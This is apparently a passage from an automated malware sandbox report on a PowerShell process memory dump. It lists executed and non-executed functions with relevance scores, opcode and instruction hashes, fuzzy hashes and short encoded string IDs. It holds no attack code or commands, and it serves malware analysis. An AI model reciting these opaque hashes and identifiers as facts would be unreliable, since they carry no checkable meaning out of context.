                                        • Instruction ID: 8b22e091dc20c75c7b7c5d33cdf20f5658ee1664a0efbb154925240687ec593f
                                        • Opcode Fuzzy Hash: 378f9d77319b4b2ac8609be997cab9df8e18c8b900863229eec3f2f13d67af7c
                                        • Instruction Fuzzy Hash: 4A01E97140E3C09ED7128B258894B62BFB4EF57224F1985DFD9888F1A7C2699849C772
                                        Function 06F80CA0 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2018241996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6f80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 388224c8f4501367cc24b16d8d5d64129c94b0a25d2f69b77e416466d97c6e11
                                        • Instruction ID: fb9316c5744fb46f6f850924c569fe22c5bdcfefe47a776126cd2c3e3e34b96a
                                        • Opcode Fuzzy Hash: 388224c8f4501367cc24b16d8d5d64129c94b0a25d2f69b77e416466d97c6e11
                                        • Instruction Fuzzy Hash: 2DF0A4607403083BE65466799C15B2E35DAAB84B04F50D018B505AF3D5DCB5AD8483AA

                                        Non-executed Functions

                                        Function 06F82148 Relevance: 9.2, Strings: 7, Instructions: 485COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2018241996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6f80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                        • API String ID: 0-1608119003
                                        • Opcode ID: 839872a082974a1ac2e9446c08eb8f13c416ab6f4944a7334ebd9dcfa29cca32
                                        • Instruction ID: 84fd280dc0f5804e8ba22ba785b3c6ac14421fbaedaaef542d6bd657a1f82e82
                                        • Opcode Fuzzy Hash: 839872a082974a1ac2e9446c08eb8f13c416ab6f4944a7334ebd9dcfa29cca32
                                        • Instruction Fuzzy Hash: 83F12732F003158FDB54AB68981066ABBE6EFD5720F2484BAD405CF255DB32EE85C7E1
                                        Function 06F82D20 Relevance: 5.5, Strings: 4, Instructions: 467COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2018241996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6f80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$4'^q$4'^q
                                        • API String ID: 0-1420252700
                                        • Opcode ID: 89a80ad97955ca02d9cee81be46fa2e23d81b20392371fb8acaf5878c0e0f664
                                        • Instruction ID: 558b06bc5146d0805f2ba849960b041406ceb9864524c9eb2ac85494efecbc4e
                                        • Opcode Fuzzy Hash: 89a80ad97955ca02d9cee81be46fa2e23d81b20392371fb8acaf5878c0e0f664
                                        • Instruction Fuzzy Hash: 8FE14732F043049FDB55AB68981076ABBE6AFD1B10F2480EBD505CF265DB32D985C7E1
                                        Function 06F809E8 Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2018241996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6f80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$tP^q$tP^q
                                        • API String ID: 0-3859475322
                                        • Opcode ID: 669cc41c1bcfd48d30f91c7f35beb87010de1641c41bbbdc469e5eb80192acf8
                                        • Instruction ID: 42deaaf9d5ca3a76d6aeb82d6a4c77c129bdd9762d5de733fe622b16258cf105
                                        • Opcode Fuzzy Hash: 669cc41c1bcfd48d30f91c7f35beb87010de1641c41bbbdc469e5eb80192acf8
                                        • Instruction Fuzzy Hash: 59412531F113189FC7546B68C814A2ABFE2AB85B10F5584DAD445DF391CE31DC89C7E2
                                        Function 06F84208 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2018241996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6f80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q
                                        • API String ID: 0-2125118731
                                        • Opcode ID: 758b1a6a37501694fd24da35eb1f22a9106eabc9b1f4c44ff58119b9ce0edbe7
                                        • Instruction ID: da918266178f03f827d0361ec9bfa3dede4dfaa96eeb9213c48724fff5a17dd9
                                        • Opcode Fuzzy Hash: 758b1a6a37501694fd24da35eb1f22a9106eabc9b1f4c44ff58119b9ce0edbe7
                                        • Instruction Fuzzy Hash: D7213B32F0831A5FEBB4696A9840B2BB6DA9BC4721F24856AA405CF385DD39D845C3A1
                                        Function 06F80080 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2018241996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6f80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$$^q$$^q
                                        • API String ID: 0-2049395529
                                        • Opcode ID: 0a6d8c130792bf9e543cedcdf9f535d7680f7ce994d8bb043f0388ccd25b38b2
                                        • Instruction ID: e42fe5b65e57b386558d6ab5de70ecd1405c3ffb3752142561e6c89ba0fca292
                                        • Opcode Fuzzy Hash: 0a6d8c130792bf9e543cedcdf9f535d7680f7ce994d8bb043f0388ccd25b38b2
                                        • Instruction Fuzzy Hash: DD01DF11A4D3854FD72B1A791C201252FB66F93A2036A42DBC081DF2EBCD258C4DC3A3